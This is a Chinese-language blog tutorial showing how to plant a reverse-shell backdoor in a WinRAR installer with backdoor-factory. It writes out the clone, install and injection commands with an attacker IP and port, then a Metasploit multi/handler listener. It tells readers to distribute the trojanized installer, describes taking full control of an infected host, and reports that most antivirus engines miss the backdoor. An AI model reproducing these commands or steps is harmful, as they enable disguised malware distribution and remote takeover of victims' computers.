后门

我们的网络不安全
https://www.youtube.com/watch?v=nJF9OTscFiQ

这次我们用到的程序叫backdoor-factory,为完整的程序注入后门程序。具体的请网上查看。

在kali linux系统上集成了该程序,但是注入后的程序显示为空文件(大小为0).故在ubuntu上手动安装尝试了一下,看我们的网络是否够安全。

注入

1.下载程序

git clone https://github.com/secretsquirrel/the-backdoor-factory.git

2.安装

sudo chmod +x ./install.sh

3.运行

sudo ./backdoor.py

4.选择目标文件

本次使用的软件为 https://rarlab.com/rar/winrar-x64-561.exe
之后将在此程序中注入后门

执行 ./babackdoor.py -f winrar-x64-561.exe -S
可以看到此程序支持代码注入

执行 ./babackdoor.py -f winrar-x64-561.exe -s show 查看支持哪几种注入方式

5.开始注入

执行 ./backdoor.py -f ./winrar-x64-561.exe -s reverse_shell_tcp_inline -H 172.17.170.38 -P 1234

reverse_shell_tcp_inline 注入方式
172.17.170.38 攻击者ip,之后受害者主机来访问该ip
1234 攻击者端口,之后受害者主机来访问该端口

选择注入的位置:


都可以,这里我们选择2

完成。可以在指定目录下找到该文件。
到这里就注入完成了。

控制

服务器等待中招的pc连接。
设置服务器。打开kali linux系统。

#msfconsole
msf> use multi/handler
msf exploit(handler)> set PAYLOAD windows/shell/reverse_tcp
msf exploit(handler) > set LPORT 1234
msf exploit(handler) > set LHOST 172.17.170.38
msf exploit(handler) > exploit

将注入好的程序散发出去。如果有计算机不幸中招。
当有中招的pc代开注入后门的程序后,服务器端会有响应。

可以看到172.17.172.223连入服务器。这时候,你就可以全权控制223这台主机了。

可以看到被控制的主机信息。(编码格式可能不对,出现乱码)

测试

对于注入后门程序的程序,会不会成功被检测到呢。我用的火绒杀毒,双击之后立马报警。

对于其他杀毒软件看看什么情况,可以看到能够查杀到此后门的杀毒软件并不多。

实际上,该程序官网下载的源文件也可能会被误杀


杀毒可以参考网站:
http://www.virscan.org/language/zh-cn/
https://www.virustotal.com/zh-cn/

参考

利用BDF向EXE文件植入后门

Backdoor factory – How to inject shell-code into windows application

Kali Linux 渗透测试 博客记录

posted @ 2019-04-08 20:02  春雨冰河  阅读(315)  评论(0编辑  收藏  举报